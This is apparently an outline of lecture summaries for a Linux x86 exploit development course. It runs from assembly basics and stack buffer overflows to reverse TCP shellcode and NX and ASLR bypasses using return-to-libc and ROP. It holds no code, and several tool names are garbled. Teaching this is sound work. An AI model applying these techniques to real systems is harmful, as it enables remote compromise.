Exploit Development for Linux (x86)

Download Ubuntu 16.04 lts 32-bit in VirtualBox to create an exploit dev machine, allocate 3 GB RAM and 20 GB disk, then install guest additions for full screen.

Install and verify essential exploit development tools on the Ubuntu lab vm, including Python, Netcat, gdb, nasm, hexdump, objcopy, objdump, Jeff, wrapper, Vim, and Kali ssh access.

Explore fundamentals of x86 assembly, focusing on common instructions and debugging with gdb, while learning about eax, ebx, ecx, edx and their subregisters, esp ebp and ip.

Learn to use sub registers to move small values into 8-bit registers like L and CL in x86 assembly, and verify with gdb breakpoints.

Explore add, sub, inc, and dec instructions in a nasm program called math dot nasm, manipulating the x register from 230 through a series of arithmetic steps, with gdb debugging.

Explore how the bitwise exclusive OR operates by XORing a register with itself to yield zero, demonstrated by loading hex 14 into a register and observing zero after XOR.

Explains push and pop instructions in x86 assembly with nasm, showing how values are pushed onto the stack and popped into eax and ebx registers.

Explore how cmp and jne drive control flow in x86 assembly. The lecture uses gdb to trace a simple c program’s if/else and a printf call.

Demonstrate how call and ret manage function calls by tracing a C program in GDB, showing right-to-left argument pushes and how the return address on the stack enables resuming main.

Explore basic stack-based buffer overflow exploitation by analyzing a vulnerable C program that uses strcpy, while learning to disable and later bypass mitigations such as stack canaries, ASLR, and NX.

Exploit a stack-based buffer overflow by compiling a simple C program, disable nx, aslr, and stack canary protections, and run a 32-bit binary to overwrite the return address.

Craft a 300-character python payload to crash a vulnerable linux x86 program, enable core dumps, and analyze core with gdb to observe the EIP overwritten by 41 41 41 41.

Find the offset to overwrite EIP using msf-pattern-create and msf-pattern-offset in Kali Linux, confirming 268 characters control the instruction pointer.

Demonstrate placing shellcode on a controllable stack space and forcing execution through a redirected instruction pointer. Use a nop sled to cushion the jump to shellcode and verify via GDB.

Demonstrate the jump to a register technique using GDB to redirect execution to a nop sled and shellcode by overwriting the IP with the jump X address from Lipsy.

Explore locating Lipsey Library base address, finding a jump gadget with roper, and redirecting execution to a nop sled and shellcode in a Linux x86 exploit demo, with ASLR disabled.

Explore the Jump ESP technique for stack-based buffer overflow, introducing shellcode placement after the EIP and using a jump to execute it, with stack analysis and exploit setup.

Learn stack based buffer overflow on linux x86 by using jump esp, placing shellcode on the stack, and locating jump esp address with roper and libc to spawn a shell.

Generate Linux x86 shellcode with MSF venom for a jump exploit. Identify bad characters, including zero and null bytes, and prepare to exclude them with a Python script.

Identify bad characters in a vulnerable Linux x86 program by generating hex values with Python, testing with gdb, and refining bad character list for clean shellcode payloads with MSF Venom.

Apply msfvenom to generate shellcode, remove bad characters, and assemble a nop sled to exploit a vulnerable linux x86 binary, establish a listener, and obtain a remote shell.

Write custom shellcode by converting C to assembly, tracing syscalls with Strace, avoiding null bytes, and extracting usable code from the ELF for exit and reverse TCP shells.

Demonstrate writing exit shellcode for Linux x86 while avoiding null bytes with xor and register manipulation. Show assembly, linking, and opcode extraction for use in exploits.

Demonstrates crafting an execve-based shellcode on Linux x86 by building a simple C program and a NASM routine, then compiling, tracing, and deploying a bin/sh shell.

Develop reverse tcp shellcode in nasm by creating a new file, setting the entry point, clearing registers, and implementing the socket syscall (int 80) for subsequent connect.

Write reverse tcp shellcode in nasm for Linux x86, covering socket creation, connect, and dup2 steps, with register cleanup, network byte order payload, and preparing shell execution.

This lecture walks through building a reverse tcp shellcode in nasm, including socket creation, connect details, fd redirection with dup2, and invoking execvp to spawn a shell.

Optimize the reverse tcp shellcode by replacing repetitive dup2 calls with a loop, then assemble, test, extract the shellcode, and integrate it into the exploit.

Explore exploit mitigation techniques such as nx non-executable stacks and address space layout randomization, and examine how these defenses affect exploits and approaches to bypass them.

Explore how the NX bit makes the stack non executable, observe its impact on a vulnerable C program, and preview return to libc and return oriented programming to bypass NX.

Explore how to bypass nx with a return-to-libc attack by calling libc's system with /bin/sh, using addresses of system and exit to spawn a shell from a vulnerable binary.

Demonstrates bypassing address space layout randomization (aslr) on Linux x86 by brute-forcing the libc base address using known offsets in a return-to-libc exploit to obtain a shell.

Learn return oriented programming (ROP) to bypass non-executable stacks on Linux x86 by chaining gadgets to execute shellcode. Explore using mprotect and careful gadget selection for reliable chains.

Demonstrate how mprotect changes a stack’s protections by passing three arguments—base address, size, and a seven flag—allowing read, write, and execute access.

Learn to build a return-oriented programming chain on Linux x86 by locating gadgets like pop adx and ret, assembling a rop chain, and handling libc base address and disabling ASLR.

Learn to locate the mprotect address and craft a return oriented programming (ROP) chain while preserving register state and making the stack executable to run shellcode.

Learn how to assemble a final exploit using a rop chain, a jump esp gadget, and shellcode to trigger a reverse tcp shell on linux x86.

Provide feedback on the Linux (x86) exploit development course to help improve future sessions, and encourage others to share the course with friends, colleagues, and on social media.

Demonstrates learning-driven exploitation of a simple C program, highlighting printf format string and gets vulnerabilities, the effects of ASLR and NX, and using pwntools and gdb to explore exploitation concepts.